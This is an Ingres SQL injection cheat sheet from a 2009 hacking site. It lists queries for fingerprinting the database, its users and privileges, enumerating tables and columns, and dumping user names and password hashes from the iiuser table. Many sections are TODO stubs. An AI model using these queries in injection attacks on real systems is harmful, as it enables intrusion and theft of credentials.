dark c0de
scanners
encryption
miscellaneous
bruteforce
irc-bots
others
development
py»exploits
[s3rvices]
Welcome:
Affiliates
[sn1ppets]
Viewed:
/home » Ingres SQL Injection Cheat Sheet
Welcome, 38.107.191.100
Send all updates to [ d3hydr8[at]gmail[dot]com ] or use the form below.
Last Modified: Tuesday, 22-Sep-2009 10:11:17 EDT

Submit:  



Version
select dbmsinfo('_version');
Comments SELECT 123; -- comment
select 123; /* comment */
Current User
select dbmsinfo('session_user');
select dbmsinfo('system_user');
List UsersFirst connect to iidbdb, then:
select name, password from iiuser;
List Password Hashes
First connect to iidbdb, then:
select name, password from iiuser;
List Privilegesselect dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');
List DBA AccountsTODO
Current Database  select dbmsinfo('database');
List Databases TODO
List Columns
select column_name, column_datatype, table_name, table_owner from iicolumns;
List Tables select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != '$ingres';
Find Tables From Column Name TODO
Select Nth Row

Astoundingly, this doesn't seem to be possible!  This is as close as you can get:

select top 10 blah from table;
select first 10 blah form table;

Select Nth Char
select substr('abc', 2, 1); -- returns 'b'
Bitwise AND 

The function "bit_and" exists, but seems hard to use.  Here's an
example of ANDing 3 and 5 together.  The result is a "byte" type
with value \001:

select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

ASCII Value -> Char

TODO
Char -> ASCII ValueTODO
(The "ascii" function exists, but doesn't seem to do what I'd expect.)
Castingselect cast(123 as varchar);
select cast('123' as integer);
String Concatenationselect 'abc' || 'def';

If Statement

TODO
Case StatementTODO
Avoiding Quotes
TODO
Time Delay 

???

See Heavy Queries article for some ideas.

Make DNS RequestsTODO
Command ExecutionTODO
Local File Access
TODO
Hostname, IP AddressTODO
Location of DB files
TODO




Advertise Here


This site is maintained by d3hydr8[at]gmail[dot]com
darkc0de.com ™ © 2006-Now


EOF